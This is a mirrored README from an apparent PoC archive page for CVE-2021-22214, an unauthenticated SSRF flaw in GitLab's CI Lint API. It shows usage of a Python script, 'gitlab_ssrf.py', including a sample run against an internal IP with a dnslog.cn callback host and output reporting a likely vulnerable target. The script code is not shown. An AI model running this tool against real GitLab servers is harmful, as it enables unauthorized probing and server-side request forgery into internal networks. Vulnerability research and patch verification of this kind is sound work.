Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1310 CNY

100%
Buy Us a Coffee

CVE-2021-22214 PoC — GitLab 代码问题漏洞

Source
https://github.com/aaminin/CVE-2021-22214
Associated Vulnerability
Title:GitLab 代码问题漏洞 (CVE-2021-22214)
Description:When requests to the internal network for webhooks are enabled, a server-side request forgery vulnerability in GitLab CE/EE affecting all versions starting from 10.5 was possible to exploit for an unauthenticated attacker even on a GitLab instance where registration is limited
Description
Gitlab CI Lint API未授权 SSRF漏洞 (CVE-2021-22214)
Readme
# CVE-2021-22214
Gitlab CI Lint API未授权 SSRF漏洞 (CVE-2021-22214)



> ***本文以及工具仅限技术分享,严禁用于非法用途,否则产生的一切后果自行承担。***



#### Usage

- help

```
$ python3 gitlab_ssrf.py

===============================================================
   _____ _ _   _           _        _____ _____ _____  ______
  / ____(_) | | |         | |      / ____/ ____|  __ \|  ____|
 | |  __ _| |_| |     __ _| |__   | (___| (___ | |__) | |__
 | | |_ | | __| |    / _` | '_ \   \___ \___ \|  _  /|  __|
 | |__| | | |_| |___| (_| | |_) |  ____) |___) | | \ \| |
  \_____|_|\__|______\__,_|_.__/  |_____/_____/|_|  \_\_|

   CVE-2021-22214              Powered by r0cky Team ZionLab
===============================================================

Example:
    python3 gitlab_ssrf.py <target> <dnshost>

```

- use

target: 192.168.80.136

![1624336331315](img/1624336331315.png)

```
$ python3 gitlab_ssrf.py http://192.168.80.136/ ssrf.sleg0x.dnslog.cn

===============================================================
   _____ _ _   _           _        _____ _____ _____  ______
  / ____(_) | | |         | |      / ____/ ____|  __ \|  ____|
 | |  __ _| |_| |     __ _| |__   | (___| (___ | |__) | |__
 | | |_ | | __| |    / _` | '_ \   \___ \___ \|  _  /|  __|
 | |__| | | |_| |___| (_| | |_) |  ____) |___) | | \ \| |
  \_____|_|\__|______\__,_|_.__/  |_____/_____/|_|  \_\_|

   CVE-2021-22214              Powered by r0cky Team ZionLab
===============================================================

[+] 可能存在 GitLab SSRF 漏洞,请查看dnslog记录.
```

![1624336369016](img/1624336369016.png)
File Snapshot

Log in to view the POC file snapshot cached by Shenlong Bot

Log in to view
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →